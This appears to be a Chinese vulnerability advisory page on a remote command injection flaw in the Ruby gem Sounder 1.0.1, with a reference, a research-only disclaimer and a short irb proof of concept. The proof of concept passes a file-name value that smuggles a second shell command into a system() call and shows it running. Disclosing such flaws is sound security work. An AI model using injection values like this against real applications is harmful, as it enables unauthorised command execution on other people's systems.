- 销售热线:010-8234 9450
RubyGems Sounder 'sound.rb'远程命令注入漏洞
2013-09-04 08:05:10
SSV-AppDir: RubyGems漏洞
发布时间: 2013-08-09 (GMT+0800)
漏洞版本:
rubygems Sounder 1.0.1
漏洞描述:
BUGTRAQ ID: 62023 Sounder是Mac OSX afplay命令的ruby gem API Sounder 1.0.1存在远程命令注入漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意命令
<* 参考
Larry W. Cashdollar (lwc@vapid.dhs.org)*>
http://seclists.org/oss-sec/2013/q3/495
测试方法:
@zihuitech.com dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
PoC:
irb(main):098:0>@file=""id;/usr/bin/id>/tmp/p;""
=>""id;/usr/bin/id>/tmp/p;""
irb(main):099:0> system %{/bin/echo "#{@file}"}
id
sh:1::Permission denied
=>false
irb(main):100:0>
larry@underfl0w:/tmp$ cat /tmp/p
uid=1000(larry) gid=600(staff) groups=600(user)
子辉安全建议:
厂商补丁: rubygems -------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: https://rubygems.org/gems/sounder